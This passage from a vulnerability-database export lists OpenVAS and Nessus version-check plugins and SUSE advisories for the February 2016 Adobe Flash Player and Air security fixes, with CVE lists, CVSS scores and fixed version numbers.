value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0398-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.569~120.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.569~120.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:10:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-022.", "modified": "2020-05-14T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810658", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810658\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:10:30 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-022.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-022\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"20.0.0.306\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 20.0.0.306\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:24:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-12T00:00:00", "id": "OPENVAS:1361412562310806684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806684", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities Feb16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Air Multiple Vulnerabilities Feb16 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806684\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-12 17:36:12 +0530 (Fri, 12 Feb 2016)\");\n script_name(\"Adobe Air Multiple Vulnerabilities Feb16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The Multiple memory corruption errors.\n\n - The Multiple use-after-free errors.\n\n - A heap buffer overflow error.\n\n - A type confusion error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before 20.0.0.260 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 20.0.0.260 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"20.0.0.260\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"20.0.0.260\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-12T00:00:00", "id": "OPENVAS:13614125623108066845", "href": "http://plugins.openvas.org/nasl.php?oid=13614125623108066845", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.8066845\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-12 17:44:11 +0530 (Fri, 12 Feb 2016)\");\n script_name(\"Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The multiple memory corruption errors.\n\n - The multiple use-after-free errors.\n\n - A heap buffer overflow error.\n\n - A type confusion error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before 20.0.0.260 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 20.0.0.260 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"20.0.0.260\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"20.0.0.260\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806866", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806866", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806866\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to take control of the affected system,\n which could lead to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.329 or 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"20.0.0.305\"))\n{\n fix = \"20.0.0.306\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.329\"))\n{\n fix = \"18.0.0.329\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-10T13:12:35", "published": "2016-02-10T13:12:35", "id": "SUSE-SU-2016:0400-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00027.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "edition": 1, "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (boo#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "modified": "2016-02-10T22:11:01", "published": "2016-02-10T22:11:01", "id": "OPENSUSE-SU-2016:0412-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00029.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-10T13:11:33", "published": "2016-02-10T13:11:33", "id": "SUSE-SU-2016:0398-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00025.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-11T12:11:42", "published": "2016-02-11T12:11:42", "id": "OPENSUSE-SU-2016:0415-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00030.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-20T12:29:58", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (bsc#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-12T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2016-186)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-12T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-186.NASL", "href": "https://www.tenable.com/plugins/nessus/88706", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-186.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88706);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", 